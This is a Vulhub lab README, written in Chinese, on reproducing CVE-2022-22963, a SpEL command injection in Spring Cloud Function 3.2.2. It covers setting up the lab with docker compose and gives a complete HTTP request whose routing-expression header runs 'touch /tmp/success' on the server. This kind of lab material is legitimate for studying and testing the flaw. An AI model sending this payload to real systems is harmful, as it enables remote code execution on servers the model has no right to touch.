aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/spring/CVE-2022-22963/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

1.4 KiB
Raw Permalink Blame History

Spring Cloud Function SpEL表达式命令注入CVE-2022-22963

Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS函数即服务function as a service平台。

参考链接:

漏洞环境

执行如下命令启动一个使用Spring Cloud Function 3.2.2编写的服务器:

docker compose up -d

服务启动后,执行curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test即可执行uppercase函数,将输入字符串转换成大写。

漏洞复现

发送如下数据包,spring.cloud.function.routing-expression头中包含的SpEL表达式将会被执行

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

可见,touch /tmp/success已经成功被执行: